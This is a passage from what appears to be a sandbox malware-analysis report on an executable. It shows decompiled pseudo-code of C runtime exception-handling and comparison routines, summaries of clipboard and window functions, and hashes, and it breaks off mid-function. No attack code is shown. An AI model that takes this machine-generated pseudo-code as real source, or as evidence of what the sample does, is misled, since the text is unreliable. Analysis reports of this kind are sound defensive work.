										if( *_t202 != 0xe06d7363) {
											L57:
											__eflags = _t218[3];
											if(_t218[3] <= 0) {
												goto L60;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L67;
												} else {
													E00BD7F07(_t204, _t216, _t218, _t225, _t202, _a8, _t216, _a16, _t218, _t204, _a28, _a32);
													_t235 = _t235 + 0x20;
													goto L60;
												}
											}
										} else {
											__eflags =  *((intOrPtr*)(_t202 + 0x10)) - 3;
											if( *((intOrPtr*)(_t202 + 0x10)) != 3) {
												goto L57;
											} else {
												__eflags =  *((intOrPtr*)(_t202 + 0x14)) - 0x19930520;
												if( *((intOrPtr*)(_t202 + 0x14)) == 0x19930520) {
													L29:
													_t225 = _a32;
													__eflags = _t218[3];
													if(_t218[3] > 0) {
														E00BD421E(_t204,  &_v68,  &_v52, _t204, _a16, _t218, _a28);
														_t216 = _v64;
														_t235 = _t235 + 0x18;
														_t179 = _v68;
														_v44 = _t179;
														_v16 = _t216;
														__eflags = _t216 - _v56;
														if(_t216 < _v56) {
															_t210 = _t216 * 0x14;
															__eflags = _t210;
															_v32 = _t210;
															do {
																_t211 = 5;
																_t182 = memcpy( &_v104,  *((intOrPtr*)( *_t179 + 0x10)) + _t210, _t211 << 2);
																_t235 = _t235 + 0xc;
																__eflags = _v104 - _t182;
																if(_v104 <= _t182) {
																	__eflags = _t182 - _v100;
																	if(_t182 <= _v100) {
																		_t214 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t217 =  *((intOrPtr*)(_t202 + 0x1c));
																			_t183 =  *((intOrPtr*)( *((intOrPtr*)(_t202 + 0x1c)) + 0xc));
																			_t184 = _t183 + 4;
																			__eflags = _t184;
																			_v36 = _t184;
																			_t185 = _v88;
																			_v40 =  *_t183;
																			_v24 = _t185;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t231 = _v40;
																				_t224 = _v36;
																				__eflags = _t231;
																				if(_t231 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_t187 = E00BD787D( &_v84,  *_t224, _t217);
																						_t235 = _t235 + 0xc;
																						__eflags = _t187;
																						if(_t187 != 0) {
																							break;
																						}
																						_t217 =  *((intOrPtr*)(_t202 + 0x1c));
																						_t231 = _t231 - 1;
																						_t224 = _t224 + 4;
																						__eflags = _t231;
																						if(_t231 > 0) {
																							continue;
																						} else {
																							_t214 = _v20;
																							_t185 = _v24;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					_push(_a32);
																					_push(_a28);
																					_push( &_v104);
																					_push( *_t224);
																					_push( &_v84);
																					_push(_a20);
																					_push(_a16);
																					_push(_v8);
																					_push(_a8);
																					_push(_t202);
																					L68();
																					_t235 = _t235 + 0x30;
																				}
																				L43:
																				_t216 = _v16;
																				goto L44;
																				L40:
																				_t214 = _t214 + 1;
																				_t185 = _t185 + 0x10;
																				_v20 = _t214;
																				_v24 = _t185;
																				__eflags = _t214 - _v92;
																			} while (_t214 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t216 = _t216 + 1;
																_t179 = _v44;
																_t210 = _v32 + 0x14;
																_v16 = _t216;
																_v32 = _t210;
																__eflags = _t216 - _v56;
															} while (_t216 < _v56);
															_t218 = _a20;
															_t225 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E00BCDCB5(_t202, _t218, _t225, __eflags);
														_t204 = _t202;
													}
													__eflags = ( *_t218 & 0x1fffffff) - 0x19930521;
													if(( *_t218 & 0x1fffffff) < 0x19930521) {
														L60:
														_t155 = E00BD1CCE(_t202, _t204, _t216, _t218, _t225);
														__eflags =  *(_t155 + 0x1c);
														if( *(_t155 + 0x1c) != 0) {
															goto L67;
														} else {
															goto L61;
														}
													} else {
														_t160 = _t218[8] >> 2;
														__eflags = _t218[7];
														if(_t218[7] != 0) {
															__eflags = _t160 & 0x00000001;
															if((_t160 & 0x00000001) == 0) {
																_push(_t218[7]);
																_t161 = E00BD76A2();
																_t204 = _t202;
																__eflags = _t161;
																if(_t161 == 0) {
																	goto L64;
																} else {
																	goto L60;
																}
															} else {
																goto L54;
															}
														} else {
															__eflags = _t160 & 0x00000001;
															if((_t160 & 0x00000001) == 0) {
																goto L60;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L60;
																} else {
																	L54:
																	 *((intOrPtr*)(E00BD1CCE(_t202, _t204, _t216, _t218, _t225) + 0x10)) = _t202;
																	_t169 = E00BD1CCE(_t202, _t204, _t216, _t218, _t225);
																	_t206 = _v8;
																	 *((intOrPtr*)(_t169 + 0x14)) = _v8;
																	goto L62;
																}
															}
														}
													}
												} else {
													__eflags =  *((intOrPtr*)(_t202 + 0x14)) - 0x19930521;
													if( *((intOrPtr*)(_t202 + 0x14)) == 0x19930521) {
														goto L29;
													} else {
														__eflags =  *((intOrPtr*)(_t202 + 0x14)) - 0x19930522;
														if( *((intOrPtr*)(_t202 + 0x14)) != 0x19930522) {
															goto L57;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E00BD1CCE(_t202, _t204, _t216, _t218, _t225) + 0x1c));
										_t196 = E00BD1CCE(_t202, _t204, _t216, _t218, _t225);
										_push(_v16);
										 *(_t196 + 0x1c) = _t225;
										_t197 = E00BD76A2();
										_t206 = _t202;
										if(_t197 != 0) {
											goto L23;
										} else {
											_t218 = _v16;
											_t255 =  *_t218 - _t225;
											if( *_t218 <= _t225) {
												L62:
												E00BD11DB(_t202, _t206, _t216, _t218, _t225, __eflags);
											} else {
												while(1) {
													_t206 =  *((intOrPtr*)(_t225 + _t218[1] + 4));
													if(E00BD746A( *((intOrPtr*)(_t225 + _t218[1] + 4)), _t255, 0xbe48c0) != 0) {
														goto L63;
													}
													_t225 = _t225 + 0x10;
													_t201 = _v20 + 1;
													_v20 = _t201;
													_t255 = _t201 -  *_t218;
													if(_t201 >=  *_t218) {
														goto L62;
													} else {
														continue;
													}
													goto L63;
												}
											}
											L63:
											_push(1);
											_push(_t202);
											E00BCDCB5(_t202, _t218, _t225, __eflags);
											_t204 =  &_v64;
											E00BD7426( &_v64);
											E00BD8D65( &_v64, 0xbe328c);
											L64:
											 *((intOrPtr*)(E00BD1CCE(_t202, _t204, _t216, _t218, _t225) + 0x10)) = _t202;
											_t163 = E00BD1CCE(_t202, _t204, _t216, _t218, _t225);
											_t204 = _v8;
											 *(_t163 + 0x14) = _v8;
											__eflags = _t225;
											if(_t225 == 0) {
												_t225 = _a8;
											}
											E00BD42BE(_t204, _t225, _t202);
											L00BD737A(_a8, _a16, _t218);
											_t166 = E00BD7392(_t218);
											_t235 = _t235 + 0x10;
											_push(_t166);
											E00BD773C(_t202, _t204, _t216, _t218, _t225, __eflags);
											goto L67;
										}
									}
								}
							}
						}
					}
				}
			}



























































                          0x00bd7ae2
                          0x00bd7aeb
                          0x00bd7af4
                          0x00bd7afa
                          0x00bd7b02
                          0x00bd7b04
                          0x00bd7b07
                          0x00bd7b0d
                          0x00bd7e81
                          0x00bd7e81
                          0x00bd7e86
                          0x00bd7e8a
                          0x00bd7e8e
                          0x00bd7e8f
                          0x00bd7e92
                          0x00bd7e93
                          0x00bd7e94
                          0x00bd7e97
                          0x00bd7e99
                          0x00bd7e9c
                          0x00bd7e9d
                          0x00bd7e9e
                          0x00bd7ea1
                          0x00bd7ea6
                          0x00bd7ea6
                          0x00bd7ea9
                          0x00bd7eac
                          0x00bd7eae
                          0x00bd7eb0
                          0x00bd7eb0
                          0x00bd7eb6
                          0x00bd7ebb
                          0x00bd7ebe
                          0x00bd7ec0
                          0x00bd7ec3
                          0x00bd7ec6
                          0x00bd7ec7
                          0x00bd7ed5
                          0x00bd7eda
                          0x00bd7edf
                          0x00bd7ee2
                          0x00bd7ee5
                          0x00bd7ee8
                          0x00bd7eeb
                          0x00bd7eec
                          0x00bd7eef
                          0x00bd7ef7
                          0x00bd7ef9
                          0x00bd7efd
                          0x00000000
                          0x00bd7efd
                          0x00bd7f06
                          0x00bd7b1c
                          0x00bd7b1c
                          0x00bd7b25
                          0x00bd7c22
                          0x00bd7c22
                          0x00bd7c25
                          0x00000000
                          0x00bd7b54
                          0x00bd7b54
                          0x00bd7b59
                          0x00000000
                          0x00bd7b5f
                          0x00bd7b5f
                          0x00bd7b67
                          0x00bd7e1f
                          0x00bd7e1f
                          0x00bd7b6d
                          0x00bd7b72
                          0x00bd7b75
                          0x00bd7b7a
                          0x00bd7b81
                          0x00bd7b86
                          0x00000000
                          0x00bd7bbe
                          0x00bd7bc6
                          0x00bd7c2a
                          0x00bd7c2a
                          0x00bd7c2d
                          0x00bd7c30
                          0x00bd7c32
                          0x00bd7c35
                          0x00bd7c38
                          0x00bd7c3e
                          0x00bd7dea
                          0x00bd7dea
                          0x00bd7ded
                          0x00000000
                          0x00bd7def
                          0x00bd7def
                          0x00bd7df2
                          0x00000000
                          0x00bd7df8
                          0x00bd7e08
                          0x00bd7e0d
                          0x00000000
                          0x00bd7e0d
                          0x00bd7df2
                          0x00bd7c44
                          0x00bd7c44
                          0x00bd7c48
                          0x00000000
                          0x00bd7c4e
                          0x00bd7c4e
                          0x00bd7c55
                          0x00bd7c6d
                          0x00bd7c6d
                          0x00bd7c70
                          0x00bd7c73
                          0x00bd7c89
                          0x00bd7c8e
                          0x00bd7c91
                          0x00bd7c94
                          0x00bd7c97
                          0x00bd7c9a
                          0x00bd7c9d
                          0x00bd7ca0
                          0x00bd7ca6
                          0x00bd7ca6
                          0x00bd7ca9
                          0x00bd7cac
                          0x00bd7cbb
                          0x00bd7cbc
                          0x00bd7cbc
                          0x00bd7cbe
                          0x00bd7cc1
                          0x00bd7cc7
                          0x00bd7cca
                          0x00bd7cd0
                          0x00bd7cd2
                          0x00bd7cd5
                          0x00bd7cd8
                          0x00bd7cde
                          0x00bd7ce1
                          0x00bd7ce6
                          0x00bd7ce6
                          0x00bd7ce9
                          0x00bd7cec
                          0x00bd7cef
                          0x00bd7cf2
                          0x00bd7cf5
                          0x00bd7cfa
                          0x00bd7cfb
                          0x00bd7cfc
                          0x00bd7cfd
                          0x00bd7cfe
                          0x00bd7d01
                          0x00bd7d04
                          0x00bd7d06
                          0x00000000
                          0x00bd7d08
                          0x00bd7d08
                          0x00bd7d0f
                          0x00bd7d14
                          0x00bd7d17
                          0x00bd7d19
                          0x00000000
                          0x00000000
                          0x00bd7d1b
                          0x00bd7d1e
                          0x00bd7d1f
                          0x00bd7d22
                          0x00bd7d24
                          0x00000000
                          0x00bd7d26
                          0x00bd7d26
                          0x00bd7d29
                          0x00000000
                          0x00bd7d29
                          0x00000000
                          0x00bd7d24
                          0x00bd7d3d
                          0x00bd7d43
                          0x00bd7d46
                          0x00bd7d49
                          0x00bd7d4c
                          0x00bd7d4d
                          0x00bd7d52
                          0x00bd7d53
                          0x00bd7d56
                          0x00bd7d59
                          0x00bd7d5c
                          0x00bd7d5f
                          0x00bd7d60
                          0x00bd7d65
                          0x00bd7d65
                          0x00bd7d68
                          0x00bd7d68
                          0x00000000
                          0x00bd7d2c
                          0x00bd7d2c
                          0x00bd7d2d
                          0x00bd7d30
                          0x00bd7d33
                          0x00bd7d36
                          0x00bd7d36
                          0x00000000
                          0x00bd7d3b
                          0x00bd7cd8
                          0x00bd7cca
                          0x00bd7d6b
                          0x00bd7d6e
                          0x00bd7d6f
                          0x00bd7d72
                          0x00bd7d75
                          0x00bd7d78
                          0x00bd7d7b
                          0x00bd7d7b
                          0x00bd7d84
                          0x00bd7d87
                          0x00bd7d87
                          0x00bd7ca0
                          0x00bd7d8a
                          0x00bd7d8e
                          0x00bd7d90
                          0x00bd7d93
                          0x00bd7d99
                          0x00bd7d99
                          0x00bd7da1
                          0x00bd7da6
                          0x00bd7e10
                          0x00bd7e10
                          0x00bd7e15
                          0x00bd7e19
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00bd7da8
                          0x00bd7dab
                          0x00bd7dae
                          0x00bd7db2
                          0x00bd7dc0
                          0x00bd7dc2
                          0x00bd7dd9
                          0x00bd7ddd
                          0x00bd7de3
                          0x00bd7de4
                          0x00bd7de6
                          0x00000000
                          0x00bd7de8
                          0x00000000
                          0x00bd7de8
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00bd7db4
                          0x00bd7db4
                          0x00bd7db6
                          0x00000000
                          0x00bd7db8
                          0x00bd7db8
                          0x00bd7dbc
                          0x00000000
                          0x00bd7dbe
                          0x00bd7dc4
                          0x00bd7dc9
                          0x00bd7dcc
                          0x00bd7dd1
                          0x00bd7dd4
                          0x00000000
                          0x00bd7dd4
                          0x00bd7dbc
                          0x00bd7db6
                          0x00bd7db2
                          0x00bd7c57
                          0x00bd7c57
                          0x00bd7c5e
                          0x00000000
                          0x00bd7c60
                          0x00bd7c60
                          0x00bd7c67
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00bd7c67
                          0x00bd7c5e
                          0x00bd7c55
                          0x00bd7c48
                          0x00bd7bc8
                          0x00bd7bd0
                          0x00bd7bd3
                          0x00bd7bd8
                          0x00bd7bdc
                          0x00bd7bdf
                          0x00bd7be5
                          0x00bd7be8
                          0x00000000
                          0x00bd7bea
                          0x00bd7bea
                          0x00bd7bed
                          0x00bd7bef
                          0x00bd7e20
                          0x00bd7e20
                          0x00000000
                          0x00bd7bf5
                          0x00bd7bfd
                          0x00bd7c08
                          0x00000000
                          0x00000000
                          0x00bd7c11
                          0x00bd7c14
                          0x00bd7c15
                          0x00bd7c18
                          0x00bd7c1a
                          0x00000000
                          0x00bd7c20
                          0x00000000
                          0x00bd7c20
                          0x00000000
                          0x00bd7c1a
                          0x00bd7bf5
                          0x00bd7e25
                          0x00bd7e25
                          0x00bd7e27
                          0x00bd7e28
                          0x00bd7e2f
                          0x00bd7e32
                          0x00bd7e40
                          0x00bd7e45
                          0x00bd7e4a
                          0x00bd7e4d
                          0x00bd7e52
                          0x00bd7e55
                          0x00bd7e58
                          0x00bd7e5a
                          0x00bd7e5c
                          0x00bd7e5c
                          0x00bd7e61
                          0x00bd7e6d
                          0x00bd7e73
                          0x00bd7e78
                          0x00bd7e7b
                          0x00bd7e7c
                          0x00000000
                          0x00bd7e7c
                          0x00bd7be8
                          0x00bd7bc6
                          0x00bd7b86
                          0x00bd7b67
                          0x00bd7b59
                          0x00bd7b25

                          APIs
                          • type_info::operator==.LIBVCRUNTIME ref: 00BD7C01
                          • ___TypeMatch.LIBVCRUNTIME ref: 00BD7D0F
                          • CatchIt.LIBVCRUNTIME ref: 00BD7D60
                          • _UnwindNestedFrames.LIBCMT ref: 00BD7E61
                          • CallUnexpected.LIBVCRUNTIME ref: 00BD7E7C
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                          • String ID: csm$csm$csm
                          • API String ID: 4119006552-393685449
                          • Opcode ID: 18981f42298a59bd5e19324ecdf86086964f89ac31930dc5b53329e88c116eaf
                          • Instruction ID: 84fd0ad0423534ab3acea4980aa4a9d183834617f0631305a37a41358cf3a807
                          • Opcode Fuzzy Hash: 18981f42298a59bd5e19324ecdf86086964f89ac31930dc5b53329e88c116eaf
                          • Instruction Fuzzy Hash: BBB10575884209ABCF25DFA4C8819EEFBF6EF54310B1445EAE8116B312FB31DA51CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BCAA60 Relevance: 12.2, APIs: 8, Instructions: 181clipboardmemoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: ClipboardGlobal$AllocEmptyLockOpen
                          • String ID:
                          • API String ID: 3590494090-0
                          • Opcode ID: 75e7e4f92c8a3611a917b39ca51ddcfd395649f6fb0a0b98d3463a15e9d343da
                          • Instruction ID: b60c12a752181185e794195ccffcd599b7f6bf02956b0e76776f7e3483fe283a
                          • Opcode Fuzzy Hash: 75e7e4f92c8a3611a917b39ca51ddcfd395649f6fb0a0b98d3463a15e9d343da
                          • Instruction Fuzzy Hash: BE81C475A002199FCB04DFA8D988AADBBF0FF08315F1484A9E885EB351E734E981CB55
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BCA2B0 Relevance: 12.1, APIs: 8, Instructions: 137windowCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: CaretFocusInvertRect$HideReleaseShow
                          • String ID:
                          • API String ID: 1353628544-0
                          • Opcode ID: e602f3efd1348817a0e357d086944c06ebb43fc6e43bac64c3c1a21c202f44f7
                          • Instruction ID: d6fef497e65af6a2bad0c289172317525434ff65c5ad6155515516783dea16e3
                          • Opcode Fuzzy Hash: e602f3efd1348817a0e357d086944c06ebb43fc6e43bac64c3c1a21c202f44f7
                          • Instruction Fuzzy Hash: A1619274A00209DFCB08DF68C198AADBBF1FF48315F1584A9E8499B351E734ED85CB96
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BC29E0 Relevance: 10.7, APIs: 7, Instructions: 190COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: CreateEvent
                          • String ID:
                          • API String ID: 2692171526-0
                          • Opcode ID: 3f47cd67c0984b81f8b93605c46c57f957f701d80e3579e6647240bb37647eef
                          • Instruction ID: f9db5f6fce2253826d50286078a08df12346ee5ce4c9a49f7bbad1cd7172b7bb
                          • Opcode Fuzzy Hash: 3f47cd67c0984b81f8b93605c46c57f957f701d80e3579e6647240bb37647eef
                          • Instruction Fuzzy Hash: 7E91C9B0908209DFDB04DFA9D488BAEBBF0FB48315F10896DE4559B354D7789988CF92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BCDF30 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                          Download Yara Rule
                          C-Code - Quality: 69%
                          			E00BCDF30(void* __ebx, void* __ecx, intOrPtr __edx, signed char* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed char* _v0;
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				void* __edi;
				void* __esi;
				signed int _t1005;
				signed int _t1012;
				intOrPtr _t1013;
				void* _t1014;
				signed char* _t1015;
				intOrPtr _t1017;
				signed int _t1020;
				signed int _t1021;
				signed int _t1022;
				signed int _t1025;
				signed int _t1028;
				signed int _t1032;
				signed char _t1049;
				signed char _t1052;
				signed char _t1053;
				signed char _t1054;
				signed char _t1055;
				signed char _t1056;
				signed int _t1245;
				intOrPtr* _t1249;
				intOrPtr _t1250;
				void* _t1252;
				signed int _t1256;
				char _t1258;
				signed int _t1262;
				signed int _t1263;
				signed int _t1270;
				signed char* _t1336;
				signed char* _t1337;
				signed char* _t1338;
				signed char* _t1339;
				signed char* _t1340;
				void* _t1341;
				intOrPtr _t1342;
				signed int _t1344;
				intOrPtr _t1347;
				signed char* _t1350;
				signed char* _t1351;
				signed char* _t1352;
				signed char* _t1353;
				signed char* _t1354;
				signed int _t1355;
				void* _t1358;
				void* _t1359;
				void* _t1365;

				_t1333 = __edx;
				_t1249 = _a4;
				_push(_t1341);
				_v5 = 0;
				_v16 = 1;
				 *_t1249 = E00BDAF01(__ecx,  *_t1249);
				_t1250 = _a8;
				_t6 = _t1250 + 0x10; // 0x11
				_t1347 = _t6;
				_push(_t1347);
				_v20 = _t1347;
				_v12 =  *(_t1250 + 8) ^  *0xbe4050;
				E00BCDEF0(_t1250, __edx, _t1341, _t1347,  *(_t1250 + 8) ^  *0xbe4050);
				E00BD2137(_a12);
				_t1005 = _a4;
				_t1359 = _t1358 + 0x10;
				_t1342 =  *((intOrPtr*)(_t1250 + 0xc));
				if(( *(_t1005 + 4) & 0x00000066) != 0) {
					__eflags = _t1342 - 0xfffffffe;
					if(_t1342 != 0xfffffffe) {
						_t1333 = 0xfffffffe;
						E00BD2120(_t1250, 0xfffffffe, _t1347, 0xbe4050);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t1005;
					_v28 = _a12;
					 *((intOrPtr*)(_t1250 - 4)) =  &_v32;
					if(_t1342 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t1256 = _v12;
							_t1012 = _t1342 + (_t1342 + 2) * 2;
							_t1250 =  *((intOrPtr*)(_t1256 + _t1012 * 4));
							_t1013 = _t1256 + _t1012 * 4;
							_t1257 =  *((intOrPtr*)(_t1013 + 4));
							_v24 = _t1013;
							if( *((intOrPtr*)(_t1013 + 4)) == 0) {
								_t1258 = _v5;
								goto L7;
							} else {
								_t1333 = _t1347;
								_t1014 = E00BD20C0(_t1257, _t1347);
								_t1258 = 1;
								_v5 = 1;
								_t1365 = _t1014;
								if(_t1365 < 0) {
									_v16 = 0;
									L13:
									_push(_t1347);
									E00BCDEF0(_t1250, _t1333, _t1342, _t1347, _v12);
									goto L14;
								} else {
									if(_t1365 > 0) {
										_t1015 = _a4;
										__eflags =  *_t1015 - 0xe06d7363;
										if( *_t1015 == 0xe06d7363) {
											__eflags =  *0xbdc628;
											if(__eflags != 0) {
												_t1245 = E00BD1F10(__eflags, 0xbdc628);
												_t1359 = _t1359 + 4;
												__eflags = _t1245;
												if(_t1245 != 0) {
													_t1355 =  *0xbdc628; // 0xbcdcb5
													 *0xbe7000(_a4, 1);
													 *_t1355();
													_t1347 = _v20;
													_t1359 = _t1359 + 8;
												}
												_t1015 = _a4;
											}
										}
										_t1334 = _t1015;
										E00BD2100(_t1015, _a8, _t1015);
										_t1017 = _a8;
										__eflags =  *((intOrPtr*)(_t1017 + 0xc)) - _t1342;
										if( *((intOrPtr*)(_t1017 + 0xc)) != _t1342) {
											_t1334 = _t1342;
											E00BD2120(_t1017, _t1342, _t1347, 0xbe4050);
											_t1017 = _a8;
										}
										_push(_t1347);
										 *((intOrPtr*)(_t1017 + 0xc)) = _t1250;
										E00BCDEF0(_t1250, _t1334, _t1342, _t1347, _v12);
										E00BD20E0();
										asm("int3");
										_push(_t1347);
										_push(_t1342);
										_t1344 = _v32;
										_t1020 = _t1344;
										__eflags = _t1020;
										if(_t1020 == 0) {
											_t1021 = 0;
											__eflags = 0;
										} else {
											_t1022 = _t1020 - 1;
											__eflags = _t1022;
											if(_t1022 == 0) {
												_t1262 =  *_v0 & 0x000000ff;
												_t1025 =  *_a4 & 0x000000ff;
												goto L511;
											} else {
												_t1028 = _t1022 - 1;
												__eflags = _t1028;
												if(_t1028 == 0) {
													_t1336 = _v0;
													_t1350 = _a4;
													_t1263 = ( *_t1336 & 0x000000ff) - ( *_t1350 & 0x000000ff);
													__eflags = _t1263;
													if(_t1263 != 0) {
														__eflags = _t1263;
														_t993 = _t1263 > 0;
														__eflags = _t993;
														_t1263 = (0 | _t993) * 2 - 1;
													}
													__eflags = _t1263;
													if(_t1263 != 0) {
														goto L513;
													} else {
														_t1262 = _t1336[1] & 0x000000ff;
														_t1025 = _t1350[1] & 0x000000ff;
														goto L511;
													}
													goto L528;
												} else {
													_t1032 = _t1028 - 1;
													__eflags = _t1032;
													if(_t1032 == 0) {
														_t1337 = _v0;
														_t1351 = _a4;
														_t1263 = ( *_t1337 & 0x000000ff) - ( *_t1351 & 0x000000ff);
														__eflags = _t1263;
														if(_t1263 != 0) {
															__eflags = _t1263;
															_t979 = _t1263 > 0;
															__eflags = _t979;
															_t1263 = (0 | _t979) * 2 - 1;
														}
														__eflags = _t1263;
														if(_t1263 != 0) {
															goto L513;
														} else {
															_t1263 = (_t1337[1] & 0x000000ff) - (_t1351[1] & 0x000000ff);
															__eflags = _t1263;
															if(_t1263 != 0) {
																__eflags = _t1263;
																_t985 = _t1263 > 0;
																__eflags = _t985;
																_t1263 = (0 | _t985) * 2 - 1;
															}
															__eflags = _t1263;
															if(_t1263 != 0) {
																goto L513;
															} else {
																_t1262 = _t1337[2] & 0x000000ff;
																_t1025 = _t1351[2] & 0x000000ff;
																goto L511;
															}
														}
														goto L528;
													} else {
														__eflags = _t1032 == 1;
														if(_t1032 == 1) {
															_t1338 = _v0;
															_t1352 = _a4;
															_t1263 = ( *_t1338 & 0x000000ff) - ( *_t1352 & 0x000000ff);
															__eflags = _t1263;
															if(_t1263 != 0) {
																__eflags = _t1263;
																_t955 = _t1263 > 0;
																__eflags = _t955;
																_t1263 = (0 | _t955) * 2 - 1;
															}
															__eflags = _t1263;
															if(_t1263 == 0) {
																_t1263 = (_t1338[1] & 0x000000ff) - (_t1352[1] & 0x000000ff);
																__eflags = _t1263;
																if(_t1263 != 0) {
																	__eflags = _t1263;
																	_t961 = _t1263 > 0;
																	__eflags = _t961;
																	_t1263 = (0 | _t961) * 2 - 1;
																}
																__eflags = _t1263;
																if(_t1263 == 0) {
																	_t1263 = (_t1338[2] & 0x000000ff) - (_t1352[2] & 0x000000ff);
																	__eflags = _t1263;
																	if(_t1263 != 0) {
																		__eflags = _t1263;
																		_t967 = _t1263 > 0;
																		__eflags = _t967;
																		_t1263 = (0 | _t967) * 2 - 1;
																	}
																	__eflags = _t1263;
																	if(_t1263 == 0) {
																		_t1262 = _t1338[3] & 0x000000ff;
																		_t1025 = _t1352[3] & 0x000000ff;
																		L511:
																		_t1263 = _t1262 - _t1025;
																		__eflags = _t1263;
																		if(_t1263 != 0) {
																			__eflags = _t1263;
																			_t973 = _t1263 > 0;
																			__eflags = _t973;
																			_t1263 = (0 | _t973) * 2 - 1;
																		}
																	}
																}
															}
															L513:
															_t1021 = _t1263;
														} else {
															_t1339 = _a4;
															_t1353 = _v0;
															_push(_t1250);
															_t1252 = 0x20;
															while(1) {
																__eflags = _t1344 - _t1252;
																if(_t1344 < _t1252) {
																	break;
																}
																_t1049 =  *_t1353;
																__eflags = _t1049 -  *_t1339;
																if(_t1049 ==  *_t1339) {
																	L42:
																	__eflags = _t1353[4] - _t1339[4];
																	if(_t1353[4] == _t1339[4]) {
																		L55:
																		__eflags = _t1353[8] - _t1339[8];
																		if(_t1353[8] == _t1339[8]) {
																			L68:
																			_t1052 = _t1353[0xc];
																			__eflags = _t1052 - _t1339[0xc];
																			if(_t1052 == _t1339[0xc]) {
																				L81:
																				_t1053 = _t1353[0x10];
																				__eflags = _t1053 - _t1339[0x10];
																				if(_t1053 == _t1339[0x10]) {
																					L94:
																					_t1054 = _t1353[0x14];
																					__eflags = _t1054 - _t1339[0x14];
																					if(_t1054 == _t1339[0x14]) {
																						L107:
																						_t1055 = _t1353[0x18];
																						__eflags = _t1055 - _t1339[0x18];
																						if(_t1055 == _t1339[0x18]) {
																							L120:
																							_t1056 = _t1353[0x1c];
